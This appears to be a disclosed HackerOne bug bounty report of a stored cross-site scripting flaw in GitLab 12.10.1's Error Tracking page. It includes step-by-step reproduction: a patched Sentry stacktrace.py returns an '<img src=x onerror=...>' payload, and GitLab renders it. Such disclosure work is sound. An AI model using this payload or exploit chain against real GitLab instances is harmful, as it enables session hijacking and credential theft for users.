Stored XSS on the Error Tracking page

HackerOne report #859888 by mike12 on 2020-04-26, assigned to @jeremymatos:

Hello Gitlab!

Steps to reproduce

1. Set up a Sentry server or just use this server: http://REDACTED .

   1. Install Sentry Server, use this doc

   2. Connect to the Sentry container: docker exec -it sentry_onpremise_web_1 /bin/bash

   3. Install Vim: apt update && apt install vim -y

   4. Open stacktrace.py file: vim /usr/local/lib/python2.7/site-packages/sentry/interfaces/stacktrace.py

   5. Replace "colNo": self.colno, with "colNo": "<img src=x onerror=alert(1)>", on line 210

      def get_api_context(self, is_public=False, pad_addr=None, platform=None):  
          from sentry.stacktraces.functions import get_function_name_for_frame  
      
          function = get_function_name_for_frame(self, platform)  
          data = {  
              "filename": self.filename,  
              "absPath": self.abs_path,  
              "module": self.module,  
              "package": self.package,  
              "platform": self.platform,  
              "instructionAddr": pad_hex_addr(self.instruction_addr, pad_addr),  
              "symbolAddr": pad_hex_addr(self.symbol_addr, pad_addr),  
              "function": function,  
              "rawFunction": self.raw_function,  
              "symbol": self.symbol,  
              "context": get_context(  
                  lineno=self.lineno,  
                  context_line=self.context_line,  
                  pre_context=self.pre_context,  
                  post_context=self.post_context,  
              ),  
              "lineNo": self.lineno,  
      -       "colNo": self.colno,  
      +       "colNo": "<img src=x onerror=alert(1)>",  
              "inApp": self.in_app,  
              "trust": self.trust,  
              "errors": self.errors,  
          }  
          if not is_public:  
              data["vars"] = self.vars  

   6. Exit from the container

   7. Restart the container: docker restart sentry_onpremise_web_1

   8. Create a new Sentry project, use this doc

   9. Capture an error using Sentry SDK. Use docs: Initialize Sentry SDK and Capture your First Error

   10. Generate a Sentry auth token, use this doc

2. Run Gitlab: docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
3. Create a new Gitlab project
4. Go to Settings->Operations->Error Tracking and connect Sentry to the Gitlab project
   1. Check the "Active" checkbox
   2. Sentry API URL: http://REDACTED:9000 (or your Sentry server URL)
   3. Auth Token: REDACTED2 (or your Sentry auth token)
   4. Project: Sentry | javascript (or your Sentry project)
5. Go to Operations->Error Tracking and open details for an error.

My GitLab version

root@gitlab:/# gitlab-rake gitlab:env:info

System information  
System:		  
Current User:	git  
Using RVM:	no  
Ruby Version:	2.6.5p114  
Gem Version:	2.7.10  
Bundler Version:1.17.3  
Rake Version:	12.3.3  
Redis Version:	5.0.7  
Git Version:	2.26.2  
Sidekiq Version:5.2.7  
Go Version:	unknown

GitLab information  
Version:	12.10.1  
Revision:	e658772bd63  
Directory:	/opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:	PostgreSQL  
DB Version:	11.7  
URL:		http://gitlab.example.com  
HTTP Clone URL:	http://gitlab.example.com/some-group/some-project.git  
SSH Clone URL:	git@gitlab.example.com:some-group/some-project.git  
Using LDAP:	no  
Using Omniauth:	yes  
Omniauth Providers: 

GitLab Shell  
Version:	12.2.0  
Repository storage paths:  
- default: 	/var/opt/gitlab/git-data/repositories  
GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
Git:		/opt/gitlab/embedded/bin/git  

Impact

An attacker can:

1. Perform any action within the application that a user can perform
2. Steal sensitive user data
3. Steal user's credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• 2.png
• 1.png